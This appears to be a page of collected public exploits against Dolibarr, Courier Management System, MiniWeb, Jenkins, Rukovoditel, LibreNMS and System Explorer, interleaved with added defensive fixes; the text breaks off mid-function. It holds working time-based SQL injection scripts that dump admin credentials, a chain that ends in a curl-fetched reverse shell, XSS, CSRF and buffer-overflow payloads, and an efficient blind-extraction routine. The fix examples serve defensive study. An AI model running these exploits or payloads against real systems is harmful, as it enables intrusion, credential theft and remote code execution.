                    for privilege in privileges:
                        if privilege in td:
                            if DEBUG:
                                print(f"  [*] Check privileges: {privilege}")
                            return 1
    if DEBUG:
        print(f"[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    headers = {
        "Referer": f"{url}commande/stats/index.php?leftmenu=orders"
    }
    datas = {"object_status": payload}
    r = SESSION.post(url=f"{url}commande/stats/index.php", data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()


def evaluate_delay(url):
    global DELTA
    deltas = []
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    for _ in range(4):
        deltas.append(check(url, payload))
    DELTA = sum(deltas)/len(deltas)
    if DEBUG:
        print(f"  [+] Delta: {DELTA}")


def get_tbl_name_len(url):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_tbl_name(url, length):
    tbl_name = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        tbl_name += chr(min)
    return tbl_name


def get_elt_len(url, tbl_name, column_name):
    i = 0
    while 1:
        payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
        if check(url, payload) >= DELTA*TRESHOLD:
            return i
        if i > 100:
            print(f"[x] Exploit failed")
            exit(-1)
        i += 1


def get_elt(url, tbl_name, column_name, length):
    elt = ""
    for i in range(1, length+1):
        min, max = 0, 127-1
        while min < max:
            mid = (max + min) // 2
            payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
            if check(url, payload) >= DELTA*TRESHOLD:
                max = mid
            else:
                min = mid + 1
        elt += chr(min)
    return elt


def get_row(url, tbl_name):
    print(f"  [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_length)
    if DEBUG:
        print(f"  [+] Infos: {infos}")
    return infos


def main(url, username, password):
    # Check if exploit is possible
    print(f"[*] Requirements:")
    if not authenticate(url, username, password):
        print(f"[x] Exploit failed!")
        exit(-1)
    get_version(url)
    get_privileges(url)

    print(f"\n[*] Starting exploit:")
    # Evaluate delay
    evaluate_delay(url)

    print(f"  [*] Extract prefix (using table: {LIKE})")
    tbl_name_len = get_tbl_name_len(url)
    tbl_name = get_tbl_name(url, tbl_name_len)
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f"  [+] Prefix: {prefix}")

    # Dump admin's infos
    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        print(f"[x] Exploit failed!")
        exit(-1)

    # Reset admin's password
    if DEBUG:
        print(f"  [*] Resetting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        print(f"[x] Exploit failed!")
        exit(-1)
    infos = get_row(url, user_table_name)

    # Remove cookies to logout
    # Change admin's password
    # Login as admin
    SESSION.cookies.clear()
    if not change_password(url, infos['login'], infos['pass_temp']):
        print(f"[x] Exploit failed!")
        exit(-1)
    authenticate(url, infos['login'], infos['pass_temp'])

    # Change antivirus's binary path
    # Trigger reverse shell
    change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"')
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()
    if not args.t or not args.u or not args.p:
        usage()
    main(args.t, args.u, args.p)
-
Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click the logged-in username in the header and select Manage Account.
Step 3: Set the user's First Name or Last Name to "<script>alert(1111)</script>".
Step 4: Click Update Profile; the payload executes as soon as the profile is rendered.
Step 5: Log out and log in again: the alert fires again (its title bar shows the site's domain), which confirms the payload is stored server-side and not merely reflected.
-
Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into the application with valid credentials.
Step 2. Click on Branch.
Step 3. Select New Branch: http://127.0.0.1/index.php?page=new_branch
Step 4. Fill in the form and click Save.
Step 5. Capture the request to "/ajax.php?action=save_branch" in Burp Suite.
Step 6. Save the request to a file and run sqlmap against it: sqlmap -r request --time-sec=5 --dbs
Step 7. The injection succeeds and the contents of every database can be dumped.

---
Parameter: ref_no (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst
---
-
MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://sourceforge.net/projects/miniweb/
# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team - https://securityforeveryone.com

'''
Description

MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request.

Exploitation

The overflow is in the handling of the first parameter's name in the POST body. Example body:

    PARAM_NAME1=param_data1&param_name2=param_data2

If PARAM_NAME1 is replaced with a long run of "A" characters, the MiniWeb server crashes.

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveryone.com, where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
'''

#!/usr/bin/python3
import socket
import sys

if len(sys.argv) != 2:
    print("[+] Usage : python exploit.py [VICTIM_IP]")
    sys.exit(0)

TCP_IP = sys.argv[1]
TCP_PORT = 8000

# Oversized name for the first POST parameter
xx = "A" * 2038  # 4085

# No Content-Length is sent: the daemon parses the body it has already received
http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host: 192.168.231.140\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print("[+] Sending exploit payload...")
s.sendall(http_req.encode())
s.close()
-
Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2231
# References:
#   https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
#   https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description:

Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token. Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.

Technical Details and Exploitation:

When a build completes, Jenkins records what caused it, and the build history view shows that cause, for example "Started by user gx1". When the 'Trigger builds remotely' feature is enabled, the cause names the remote client IP instead of a username: Started by remote host '<client-ip-address>'. To see how the remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493

The "Started by remote host '<client-ip-address>'" message is not escaped. That could look harmless, since a client cannot choose its own remote IP. This is not completely true: when the application server sits behind a proxy, the peer address it sees is the proxy's, not the client's. In that deployment, X-headers are used to tell the application server who the real client is. A common one is X-Forwarded-For, which load balancers insert into the data stream to identify the address of the connecting client. Whoever controls that header controls the string Jenkins stores and renders.

To exploit the vulnerability the attacker requires several conditions:

- Remote build triggering must be enabled, and the attacker must either know the job's authentication token or hold Job/Configure permission (which lets them configure that token);
- The application server hosting Jenkins must use some X-header to override the client IP. This is common, because the application server usually sits behind a proxy and an override mechanism is needed to recover the client IP. For example, Apache Tomcat can be configured to process the X-Forwarded-For header as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html.

Proof Of Concept:

1. Identify the X-header the application server uses to override the proxy IP. Suppose "X-Forwarded-For" is used. The attacker can then inject the payload as the "X-Forwarded-For" header value.

2. Send the following request:

GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close

Response (the build is queued):

HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close

<project_name> is the project that can be remotely built using <token>.

3. To trigger the XSS, open the build item in the build history once the build has finished. For example, if the build that just finished is #16, the stored XSS fires at http://<jenkins_host>/job/<project_name>/16/

Solution:

The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
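The root cause above is a request header under the client's control being treated as the trusted peer address and then written into the page without escaping. The block below is an added example written for this page (it is not Jenkins code and not part of the advisory) of the two checks that close that hole: only honour X-Forwarded-For when the TCP peer is a proxy you configured, accept only a value that parses as an IP literal, and HTML-escape whatever ends up in the markup. The same html.escape call on output is the fix for the stored profile-field XSS in the Courier Management System entry earlier on this page. The proxy address and header values are constructed for the example.

```python
import html
import ipaddress

# Constructed for this example: the reverse proxies allowed to set X-Forwarded-For
TRUSTED_PROXIES = {"10.0.0.5"}


def client_address(peer_addr, xff_header, trusted_proxies=TRUSTED_PROXIES):
    """Address to record as the host that triggered the build.

    X-Forwarded-For is only consulted when the TCP peer is a trusted proxy, and
    the leftmost entry (the original client as seen by the first proxy) is only
    accepted if it is a syntactically valid IPv4/IPv6 literal. Anything else,
    including the advisory's gx1<script>alert(1);</script> value, is discarded
    and the socket address is used instead.
    """
    if xff_header and peer_addr in trusted_proxies:
        candidate = xff_header.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            pass
    return peer_addr


def started_by_remote_host(addr):
    """Build-cause text with the address HTML-escaped, whatever it contains.

    Escaping on output is the second line of defence: even if validation is
    bypassed, or another code path stores raw input (the First Name / Last Name
    fields in the Courier Management System entry), the markup cannot execute.
    """
    return "Started by remote host '%s'" % html.escape(addr, quote=True)
```

With both functions in place the PoC request from step 2 is recorded as the proxy's own address and, even if it were recorded verbatim, would render as literal text.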
-
Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
# Date: 2020-12-14
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# Tested on: Kali Linux

POC (localhost/index.php?module=users/change_password):

<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://localhost/index.php?module=users/change_password&action=change" method="POST">
      <input type="hidden" name="form_session_token" value="D^HUyTDh0X" />
      <input type="hidden" name="password_new" value="123456789" />
      <input type="hidden" name="password_confirmation" value="123456789" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
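The PoC above carries a hidden form_session_token and still succeeds from an attacker's page, which means the change-password handler accepts that value on behalf of the victim's session: whether the token is static, guessable, or simply never compared against the session, it is not doing its job. The block below is an added example, not Rukovoditel's code, of what a working anti-CSRF check looks like: a token derived from the victim's session identifier with a server-side secret, compared in constant time, plus an Origin check. The secret, site origin and session identifiers are constructed for the example.

```python
import hashlib
import hmac

# Constructed for this example; a real deployment loads the secret from
# configuration and never from anything the request contains.
SERVER_SECRET = b"rotate-me-per-deployment"
SITE_ORIGIN = "https://localhost"


def make_form_token(session_id, secret=SERVER_SECRET):
    """Per-session anti-CSRF token: HMAC-SHA256(secret, session_id).

    Binding the token to the session means a value copied out of the attacker's
    own session (the PoC's hard-coded form_session_token) never matches the
    victim's, and an attacker who cannot read the victim's session cookie
    cannot compute the right one either.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_check(session_id, form_token, origin_header,
               secret=SERVER_SECRET, site_origin=SITE_ORIGIN):
    """Return True only for a request that is allowed to change the password.

    - the submitted token must equal the one derived from *this* session;
      hmac.compare_digest keeps the comparison constant-time;
    - when the browser sends an Origin header it must be our own origin. A form
      auto-submitted from the attacker's page carries the attacker's origin.
    """
    if not isinstance(form_token, str) or not form_token:
        return False
    expected = make_form_token(session_id, secret)
    if not hmac.compare_digest(expected, form_token):
        return False
    if origin_header is not None and origin_header != site_origin:
        return False
    return True
```

The handler calls csrf_check with the session id from the cookie, the posted form_session_token and the Origin header; the value D^HUyTDh0X from the PoC fails the first comparison for every session but the one it was minted for, and a cross-origin submission fails the second even if the token were leaked.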
-
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; newer versions might be affected up to the 1.69 patch
# CVE : N/A

#!/usr/bin/python3
# EXAMPLE:
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
#
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
#
# [+] Done!

import os
import re
import sys

import requests
import urllib3
from bs4 import BeautifulSoup

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
timeout = 10

# Injection prefix and suffix: (select(sleep(<n>-(if(<cond>,0,<n>)))))
inj_prefix = "(select(sleep("
inj_suffix = ")))))"

# Decimal begin and end
dec_begin = 48
dec_end = 57

# ASCII char begin and end
ascii_begin = 32
ascii_end = 126


# Handle CTRL-C
def keyboard_interrupt():
    """Handles keyboardinterrupt exceptions"""
    print("\n\n[*] User requested an interrupt, exiting...")
    exit(0)


# Custom headers
def http_headers():
    headers = {
        'User-Agent': 'Mozilla',
    }
    return headers


def check_auth(url, headers):
    print("[*] Checking if authentication for page is required...")
    target = url + "/graph.php"
    r = requests.get(target, headers=headers, timeout=timeout, verify=False)
    return "Unauthorized" in r.text


def get_initial_token_and_cookies(url, headers):
    print("[*] Visiting page to retrieve initial token and cookies...")
    target = url + "/login"
    r = requests.get(target, headers=headers, timeout=timeout, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    for n in soup('input'):
        if n.get('name') == "_token":
            return n['value'], r.cookies
    return None, r.cookies


def get_valid_cookie(url, headers, token, cookies, usern, passw):
    print("[*] Retrieving authenticated cookie...")
    post_data = {'_token': token, 'username': usern, 'password': passw, 'submit': ''}
    target = url + "/login"
    r = requests.post(target, data=post_data, headers=headers, cookies=cookies,
                      timeout=timeout, verify=False)
    if "Overview | LibreNMS" in r.text:
        return r.cookies
    print("[!] No valid response from used session, exiting!\n")
    exit(-1)


# Perform the SQLi call for injection
def sqli(url, headers, cookies, inj_str, sleep):
    # Spaces are replaced by inline comments; the query string is built by hand
    # and passed as-is so requests does not re-encode it
    comment_inj_str = re.sub(" ", "/**/", inj_str)
    inj_params = {'id': '1', 'stat': 'none', 'type': 'port_mac_acc_total',
                  'sort': comment_inj_str, 'debug': '1'}
    inj_params_unencoded = "&".join("%s=%s" % (k, v) for k, v in inj_params.items())
    # Do GET request
    r = requests.get(url, params=inj_params_unencoded, headers=headers, cookies=cookies,
                     timeout=timeout, verify=False)
    # True when the injected condition held (the server slept for `sleep` seconds)
    return r.elapsed.total_seconds() >= sleep


# Extract rows
def get_rows(url, headers, cookies, table, sleep):
    rows = ""
    max_pos_rows = 4
    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
    for pos in range(1, max_pos_rows + 1):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = (inj_prefix + str(sleep)
                   + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM "
                   + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix)
        if not sqli(url, headers, cookies, inj_str, sleep):
            break
        # Loop decimals
        direction = "="
        for num_rows in range(dec_begin, dec_end + 1):
            row_char = chr(num_rows)
            inj_str = (inj_prefix + str(sleep)
                       + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM "
                       + table + ")," + str(pos) + ",1))" + direction + str(num_rows) + ",0,"
                       + str(sleep) + inj_suffix)
            if sqli(url, headers, cookies, inj_str, sleep):
                rows += row_char
                print(row_char, end='', flush=True)
                break
    if rows != "":
        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
        return int(rows)
    return False


# Loop through positions and characters
def get_data(url, headers, cookies, row, column, table, sleep):
    extracted = ""
    max_pos_len = 50
    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    print("[*] Extracting strings from row " + str(row + 1) + "...")
    for pos in range(1, max_pos_len):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = (inj_prefix + str(sleep)
                   + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from "
                   + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction
                   + str(ascii_begin) + ",0," + str(sleep) + inj_suffix)
        if not sqli(url, headers, cookies, inj_str, sleep):
            break
        # Loop through ASCII printable characters
        direction = "="
        for guess in range(ascii_begin, ascii_end + 1):
            extracted_char = chr(guess)
            inj_str = (inj_prefix + str(sleep)
                       + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from "
                       + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction
                       + str(guess) + ",0," + str(sleep) + inj_suffix)
            if sqli(url, headers, cookies, inj_str, sleep):
                extracted += extracted_char
                print(extracted_char, end='', flush=True)
                break
    return extracted


# Main
def main(argv):
    if len(sys.argv) == 5:
        usern = sys.argv[1]
        passw = sys.argv[2]
        url = sys.argv[3]
        sleep = int(sys.argv[4])
    else:
        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
        exit(0)

    # Random headers
    headers = http_headers()

    # Do stuff
    try:
        # Get a valid initial token and cookies
        token, cookies = get_initial_token_and_cookies(url, headers)

        # Check if authentication is required
        auth_required = check_auth(url, headers)
        if auth_required:
            # Get an authenticated session cookie using credentials
            valid_cookies = get_valid_cookie(url, headers, token, cookies, usern, passw)
        else:
            valid_cookies = cookies
            print("[+] Authentication not required, continue without authentication...")

        # Setting the correct vulnerable page
        url = url + "/graph.php"

        # The columns to retrieve
        columns = ['username', 'password']
        # The table to retrieve data from
        table = "users"

        # Getting rows
        print("[*] Printing number of rows in table...")
        rows = get_rows(url, headers, valid_cookies, table, sleep)
        if not rows:
            print("[!] Unable to retrieve rows, check requests.\n")
            exit(-1)

        # Getting values for found rows in specified columns
        for column in columns:
            print("[*] Retrieving " + str(rows) + " rows of data using '" + column
                  + "' as column and '" + table + "' as table...")
            for row in range(0, rows):
                # rowval_len = get_length(url,headers,row,column,table)
                retrieved = get_data(url, headers, valid_cookies, row, column, table, sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for column '" + column
                      + "' in row " + str(row + 1))

        # Done
        print("\n[+] Done!\n")

    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    except requests.exceptions.HTTPError as e:
        print("[!] Failed with error code - " + str(e) + "\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()
        exit(-1)


# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])
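The three time-based entries on this page (the Dolibarr script, the sqlmap output for Courier Management System's ref_no, and the LibreNMS script above) all extract data the same way: make the database SLEEP() when a condition holds and read the answer from the response time. The block below is an added example written for this page, not code from any of those exploits, that isolates the extraction loop: calibrate the delay first, treat a response slower than a fraction of it as "true", find the value's length, then recover each byte by bisection over the ASCII range. The target is simulated in-process (it parses the three payload shapes the extractor emits and returns a fake elapsed time instead of sleeping), and the table llx_user with the value admin is constructed sample data. The bisection is the part worth copying: the LibreNMS script walks every printable character and can spend up to 95 requests on one byte (its author notes it should use a guessing algorithm), whereas bisection needs exactly seven.

```python
import re
import statistics

DELAY = 2.0        # seconds passed to SLEEP()
THRESHOLD = 0.8    # a response slower than THRESHOLD * calibrated delay counts as "true"
BASELINE = 0.15    # constructed: normal round-trip time of the stand-in target


class SimulatedTarget:
    """Stand-in for the injectable endpoint (constructed for this example).

    It understands only the three payload shapes extract_value() produces and
    returns a fake elapsed time instead of sleeping, so the example runs offline.
    """

    CALIB = re.compile(r"^IF\(0<1, SLEEP\(([\d.]+)\), SLEEP\(0\)\)$")
    LENGTH = re.compile(r"^IF\(\(SELECT LENGTH\((\w+)\) FROM (\w+) LIMIT 1\)>(\d+), "
                        r"SLEEP\(0\), SLEEP\(([\d.]+)\)\)$")
    CHAR = re.compile(r"^IF\(\(SELECT ASCII\(SUBSTR\((\w+),(\d+),1\)\) FROM (\w+) LIMIT 1\)<=(\d+), "
                      r"SLEEP\(([\d.]+)\), SLEEP\(0\)\)$")

    def __init__(self, rows):
        self.rows = rows          # {table: {column: value}}, one row per table
        self.requests = 0

    def elapsed(self, payload):
        """Seconds the 'server' took to answer the injected condition."""
        self.requests += 1
        m = self.CALIB.match(payload)
        if m:
            return BASELINE + float(m.group(1))
        m = self.LENGTH.match(payload)
        if m:
            col, tbl, n, d = m.groups()
            return BASELINE if len(self.rows[tbl][col]) > int(n) else BASELINE + float(d)
        m = self.CHAR.match(payload)
        if m:
            col, i, tbl, mid, d = m.groups()
            value = self.rows[tbl][col]
            return BASELINE + float(d) if ord(value[int(i) - 1]) <= int(mid) else BASELINE
        raise ValueError("unsupported payload: " + payload)


def extract_value(elapsed, table, column, max_len=100):
    """Recover the first row's `column` from `table` through the timing oracle.

    `elapsed(payload)` must return the response time in seconds for a request
    that injects `payload` (against a real target: the function that sends it).
    """
    # 1. Calibrate: how long does a guaranteed-true SLEEP really take end to end?
    calib = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    delta = statistics.mean([elapsed(calib) for _ in range(3)])

    def slow(payload):
        return elapsed(payload) >= delta * THRESHOLD

    # 2. Length: the first n for which LENGTH(col) > n is false triggers the sleep
    length = None
    for n in range(max_len + 1):
        if slow(f"IF((SELECT LENGTH({column}) FROM {table} LIMIT 1)>{n}, SLEEP(0), SLEEP({DELAY}))"):
            length = n
            break
    if length is None:
        raise RuntimeError("value longer than max_len or the oracle is not answering")

    # 3. Each byte by bisection over 0..127: exactly 7 requests per byte
    out = ""
    for i in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if slow(f"IF((SELECT ASCII(SUBSTR({column},{i},1)) FROM {table} LIMIT 1)<={mid}, "
                    f"SLEEP({DELAY}), SLEEP(0))"):
                hi = mid
            else:
                lo = mid + 1
        out += chr(lo)
    return out


def demo():
    """Run the extractor against the simulated target; returns (value, request count)."""
    target = SimulatedTarget({"llx_user": {"login": "admin"}})   # constructed sample row
    value = extract_value(target.elapsed, "llx_user", "login")
    return value, target.requests


if __name__ == "__main__":
    print(demo())
```

demo() recovers "admin" in 44 requests: three for calibration, six for the length and seven per character. Against a real target the elapsed time also carries network jitter, so run the calibration several times, keep THRESHOLD below 1.0, and re-query a byte whenever a bisection lands on an implausible character rather than trusting a single slow or fast response.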
-
System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Date: 2020-10-14
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://systemexplorer.net/
# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe
# Version: Version 7.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763

# Service info:

C:\Users\m507>sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SystemExplorerHelpService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Explorer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\m507>

# Exploit:
The image path contains spaces, is not quoted, and the service runs as LocalSystem. A local user who can write to C:\ or to C:\Program Files (x86)\ can plant an executable at one of the paths Windows tries before the real binary (C:\Program.exe, C:\Program Files.exe or C:\Program Files (x86)\System.exe) and have it run with SYSTEM privileges the next time the service starts. Two caveats: START_TYPE is DEMAND_START, so the planted binary runs when the service is next started (by the application, by an administrator, or after a reboot if something starts it) rather than unconditionally at boot; and the default ACLs on C:\ and C:\Program Files (x86)\ do not let a standard user create files there, so check them with icacls before counting on this for privilege escalation.
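The two unquoted-service-path entries on this page find the condition with a wmic/findstr one-liner and confirm it with sc qc. The block below is an added example written for this page (not the advisory author's code) that does the same triage offline: it parses sc qc output, decides whether the path is unquoted, and lists, in the order CreateProcess tries them, the file names an attacker would have to plant. CreateProcess walks an unquoted command line one space at a time, appends .exe to a prefix that has no extension, and runs the first file that exists. The sample output embedded below is the one quoted in this entry; the parser assumes English field names.

```python
import re

# Constructed for this example from the `sc qc` output quoted in this entry
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SystemExplorerHelpService
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : System Explorer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(output):
    """`sc qc` output (English field names) -> {field: value}."""
    fields = {}
    for line in output.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_unquoted(binary_path):
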